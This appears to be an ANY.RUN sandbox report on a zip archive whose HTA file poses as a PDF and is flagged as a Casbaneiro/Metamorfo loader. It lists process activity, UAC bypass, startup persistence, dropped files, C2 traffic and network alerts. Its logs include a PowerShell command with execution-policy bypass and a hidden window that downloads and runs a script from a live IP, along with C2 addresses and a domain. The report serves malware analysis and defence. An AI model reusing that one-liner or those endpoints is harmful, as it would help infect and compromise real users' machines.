File name:

Adjuntos04-Junio.PDF-TJBNKHP.zip

Full analysis: https://app.any.run/tasks/b759071e-9cbf-40c8-ad68-876e28b5850b
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: June 04, 2024, 20:25:36
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
casbaneiro
metamorfo
uac
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5:

82003AA5C6D6E08678709848218B85B2

SHA1:

A03407FBFCE6CBB7052C14311C53252F13A53AB0

SHA256:

12DF42601CCD2DF232BF3667E1E12F8B11D79F55D9787AE9A824694A4ECE4AF2

SSDEEP:

12:5jn4K3HxatsaS09HpljpBCgAhL9cG1LTB56LgNe4HjIDEBTkBHXGNennbMAcnFkG:9nH3HIWC3ADTB5NNeKTgGinEnFkUm0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 1424)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1424)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 1424)

    • Create files in the Startup directory

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Bypass User Account Control (Modify registry)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Connects to the CnC server

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • CASBANEIRO has been detected (SURICATA)

      • powershell.exe (PID: 1424)

    • Changes powershell execution policy (Bypass)

      • mshta.exe (PID: 1756)

    • Drops the executable file immediately after the start

      • powershell.exe (PID: 2208)

  • SUSPICIOUS

    • Reads the Internet Settings

      • rundll32.exe (PID: 4072)
      • mshta.exe (PID: 1756)
      • powershell.exe (PID: 1424)
      • sipnotify.exe (PID: 2044)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • sipnotify.exe (PID: 1888)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Probably download files using WebClient

      • mshta.exe (PID: 1756)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Connects to the server without a host name

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Changes default file association

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • The process executes via Task Scheduler

      • ctfmon.exe (PID: 1692)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)
      • ctfmon.exe (PID: 1596)

    • Contacting a server suspected of hosting an CnC

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • The system shut down or reboot

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • Application launched itself

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • mshta.exe (PID: 1756)
      • cmd.exe (PID: 2120)
      • cmd.exe (PID: 2180)

    • The process bypasses the loading of PowerShell profile settings

      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)

    • Reads settings of System Certificates

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)

    • Found IP address in command line

      • powershell.exe (PID: 1424)

    • Possibly malicious use of IEX has been detected

      • mshta.exe (PID: 1756)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 2208)

    • Runs shell command (SCRIPT)

      • mshta.exe (PID: 1756)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2208)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 2208)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 2208)

  • INFO

    • Manual execution by a user

      • rundll32.exe (PID: 4072)
      • wmpnscfg.exe (PID: 1932)
      • notepad.exe (PID: 124)
      • notepad.exe (PID: 1872)
      • notepad.exe (PID: 2040)
      • mshta.exe (PID: 1756)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • cmd.exe (PID: 2156)
      • cmd.exe (PID: 2412)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • cmd.exe (PID: 2180)
      • cmd.exe (PID: 2120)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2736)

    • Reads security settings of Internet Explorer

      • rundll32.exe (PID: 4072)
      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)

    • Checks supported languages

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • IMEKLMG.EXE (PID: 2096)
      • IMEKLMG.EXE (PID: 2104)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)
      • wmpnscfg.exe (PID: 2736)

    • Reads Internet Explorer settings

      • mshta.exe (PID: 1756)

    • Disables trace logs

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Reads the computer name

      • wmpnscfg.exe (PID: 1932)
      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • wmpnscfg.exe (PID: 2764)
      • wmpnscfg.exe (PID: 2736)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)
      • _uhcrtd3_Yi7.exe (PID: 2140)
      • wmpnscfg.exe (PID: 2784)
      • wmpnscfg.exe (PID: 2808)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2252)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)
      • powershell.exe (PID: 2260)
      • powershell.exe (PID: 2252)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 1424)
      • powershell.exe (PID: 2208)
      • powershell.exe (PID: 2448)

    • Process checks whether UAC notifications are on

      • IMEKLMG.EXE (PID: 2128)
      • IMEKLMG.EXE (PID: 2136)
      • IMEKLMG.EXE (PID: 2104)
      • IMEKLMG.EXE (PID: 2096)

    • Reads the software policy settings

      • sipnotify.exe (PID: 2044)
      • sipnotify.exe (PID: 1888)

    • Checks proxy server information

      • mshta.exe (PID: 1756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0002
ZipCompression: Deflated
ZipModifyDate: 2024:06:04 17:36:52
ZipCRC: 0x85adba13
ZipCompressedSize: 520
ZipUncompressedSize: 1120
ZipFileName: Adjuntos04-Junio.PDF-TJBNKHP.hta
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
172
Monitored processes
36
Malicious processes
9
Suspicious processes
3

Behavior graph

Click at the process to see the details
start winrar.exe no specs rundll32.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs notepad.exe no specs mshta.exe #CASBANEIRO powershell.exe wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs cmd.exe no specs powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs shutdown.exe no specs ctfmon.exe no specs sipnotify.exe imeklmg.exe no specs imeklmg.exe no specs cmd.exe no specs _uhcrtd3_yi7.exe cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe powershell.exe wmpnscfg.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
124"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1200"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1212"C:\Windows\system32\shutdown.exe" /r /t 15C:\Windows\System32\shutdown.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\shutdown.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\secur32.dll
1424"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex (new-object net.webclient).downloadstring('http://94.131.117.72/ldvb/pw')"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1596C:\Windows\System32\ctfmon.exe C:\Windows\System32\ctfmon.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
1692C:\Windows\System32\ctfmon.exe C:\Windows\System32\ctfmon.exetaskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CTF Loader
Exit code:
1073807364
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ctfmon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\msctfmonitor.dll
c:\windows\system32\msctf.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
1756"C:\Windows\System32\mshta.exe" "C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.hta" C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.9600.16428 (winblue_gdr.131013-1700)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
1872"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\Adjuntos04-Junio.PDF-TJBNKHP.htaC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
1888C:\Windows\system32\sipnotify.exe -LogonOrUnlockC:\Windows\System32\sipnotify.exe
taskeng.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
sipnotify
Exit code:
0
Version:
6.1.7602.20480 (win7sp1_ldr_escrow.191010-1716)
Modules
Images
c:\windows\system32\sipnotify.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1932"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
Total events
43 806
Read events
43 482
Write events
287
Delete events
37

Modification events

(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3968) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\phacker.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\Win7-KB3191566-x86.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\Adjuntos04-Junio.PDF-TJBNKHP.zip
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3968) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
Executable files
6
Suspicious files
24
Text files
24
Unknown types
3

Dropped files

PID
Process
Filename
Type
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3968.10349\Adjuntos04-Junio.PDF-TJBNKHP.htahtml
MD5:8A309B30AEB277EB7A2363484EBE804C
SHA256:C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7B9FC8EDA8DFC3E128623081DB20030C
SHA256:81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED
1756mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\0105[1]text
MD5:191CE61AB2D4FFCFBAF5F83A0CA1F1CD
SHA256:606B26B3F230260B7665605B6B2941FC92CDAB086DD2C7E38C655F0A8E976DD4
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF114f46.TMPbinary
MD5:0268C3470C936E6FBAC2945B9E1C2099
SHA256:DF2AF58E8879B48826D8A418ED3B02CC8D484BCFC231C5B7A11BD153ED3998E9
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3968.11125\Adjuntos04-Junio.PDF-TJBNKHP.htahtml
MD5:8A309B30AEB277EB7A2363484EBE804C
SHA256:C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V1WWS18NNFDQ95WJHPEB.tempbinary
MD5:7B9FC8EDA8DFC3E128623081DB20030C
SHA256:81FB596D7C5C7C9264E891A660D7B00455DD9AC326B9B53816B1F2FE38F4FAED
1424powershell.exeC:\Users\admin\AppData\Local\Temp\k0swbrno.ng0.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
3968WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3968.5925\Adjuntos04-Junio.PDF-TJBNKHP.htahtml
MD5:8A309B30AEB277EB7A2363484EBE804C
SHA256:C4068F41C6301757FE23051F7B4B4312FB0CFBA3BC618725297CAC803875AD78
1424powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_dcpgky3_HAA.lnklnk
MD5:E8C4A48495A8741F4C4D3CA77AA9E812
SHA256:3E80267167AA0CBC78125BF5F01DD56712A4F839B01E9DBB213D177D6A0596BC
1424powershell.exeC:\users\public\USER-PC_dcpgky3_H.cmdtext
MD5:9FA1754C03684ADD2F1317071460E448
SHA256:64C97EB830AC01D67F7C732EF35601DBA32CA831909FB0456CC7FCADD2C9C69F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
38
DNS requests
12
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
94.131.117.72:80
http://94.131.117.72/ldvb/0105
unknown
unknown
1424
powershell.exe
POST
200
94.131.117.72:80
http://94.131.117.72/ldht/index.php
unknown
unknown
1424
powershell.exe
GET
200
94.131.117.72:80
http://94.131.117.72/ldvb/pw
unknown
unknown
2208
powershell.exe
POST
200
86.38.217.167:80
http://86.38.217.167/ps1/index.php
unknown
unknown
2044
sipnotify.exe
HEAD
200
88.221.61.151:80
http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620100584530000
unknown
unknown
1392
svchost.exe
GET
200
23.48.23.156:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
unknown
1392
svchost.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
unknown
2044
sipnotify.exe
HEAD
200
88.221.61.151:80
http://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE2JgkA?v=133620101195930000
unknown
unknown
1392
svchost.exe
GET
304
217.20.57.18:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?59c6d662c26e01b9
unknown
unknown
1072
svchost.exe
GET
304
217.20.57.18:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?90423d3b50428e59
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
1088
svchost.exe
224.0.0.252:5355
unknown
1756
mshta.exe
94.131.117.72:80
ZAYO-6461
US
unknown
1424
powershell.exe
94.131.117.72:80
ZAYO-6461
US
unknown
1100
svchost.exe
224.0.0.252:5355
unknown
1460
svchost.exe
239.255.255.250:3702
unknown
2044
sipnotify.exe
88.221.61.151:80
query.prod.cms.rt.microsoft.com
AKAMAI-AS
DE
unknown
2208
powershell.exe
93.127.200.211:443
fsnat.shop
diva-e Datacenters GmbH
DE
unknown
2448
powershell.exe
93.127.200.211:443
fsnat.shop
diva-e Datacenters GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
query.prod.cms.rt.microsoft.com
  • 88.221.61.151
whitelisted
fsnat.shop
  • 93.127.200.211
unknown
firebasestorage.googleapis.com
  • 142.250.181.234
  • 216.58.206.42
  • 172.217.16.138
  • 142.250.186.106
  • 142.250.185.202
  • 172.217.16.202
  • 142.250.184.234
  • 142.250.74.202
  • 142.250.185.234
  • 142.250.184.202
  • 142.250.186.74
  • 142.250.186.42
  • 172.217.18.10
  • 142.250.186.170
  • 216.58.206.74
  • 142.250.185.170
whitelisted
config.messenger.msn.com
  • 64.4.26.155
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
ctldl.windowsupdate.com
  • 217.20.57.18
  • 217.20.57.34
whitelisted
crl.microsoft.com
  • 23.48.23.156
  • 23.48.23.143
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted

Threats

PID
Process
Class
Message
1424
powershell.exe
Potentially Bad Traffic
SUSPICIOUS [ANY.RUN] Get-WmiObject Cmdlet was detected
1424
powershell.exe
A Network Trojan was detected
LOADER [ANY.RUN] Casbaneiro Server Response (Metamorfo)
1424
powershell.exe
A suspicious string was detected
SUSPICIOUS [ANY.RUN] Decoding FromBase64 HTTP URI String
1424
powershell.exe
A Network Trojan was detected
ET MALWARE Horabot Payload Inbound
2208
powershell.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to connect to TLS FireBase Storage
1756
mshta.exe
A Network Trojan was detected
SUSPICIOUS [ANY.RUN] VBS is used to run Shell
1756
mshta.exe
Potentially Bad Traffic
ET HUNTING PowerShell DownloadString Command Common In Powershell Stagers
7 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Adjuntos04-Junio.PDF-TJBNKHP.zip